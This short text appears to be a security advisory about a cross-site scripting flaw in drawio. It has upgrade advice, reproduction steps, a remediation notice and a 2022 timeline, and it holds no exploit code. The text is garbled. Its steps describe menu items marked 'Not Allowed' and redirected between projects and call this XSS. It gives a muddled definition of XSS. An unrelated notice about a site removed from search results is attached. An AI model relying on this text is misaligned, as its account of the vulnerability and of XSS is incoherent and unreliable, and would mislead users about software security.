If you are using an older version of drawio, you should upgrade to at least version 20.3.1 before proceeding. If you do not have a prior version of drawio, you can acquire it from GitHub. Now open the project in drawio. You should notice that the menu items are marked as “Not Allowed”. You will also see that the menu items redirect to the menu items of other projects. This is XSS. Now go to one of the other projects. You will notice that the menu items have been redirected to the menu items in your project. This is XSS. XSS is a vulnerability because it allows an attacker to transfer information from one website to another website that the user has access to.

Issue - SRH -214

The company was recently notified of a vendor-compromised XSS vulnerability in its website. The company's IT department immediately remediated the security issue and is informing customers that this site has been removed from the official search engine results.

Timeline

Published on: 09/16/2022 11:15:00 UTC
Last modified on: 09/20/2022 18:18:00 UTC

References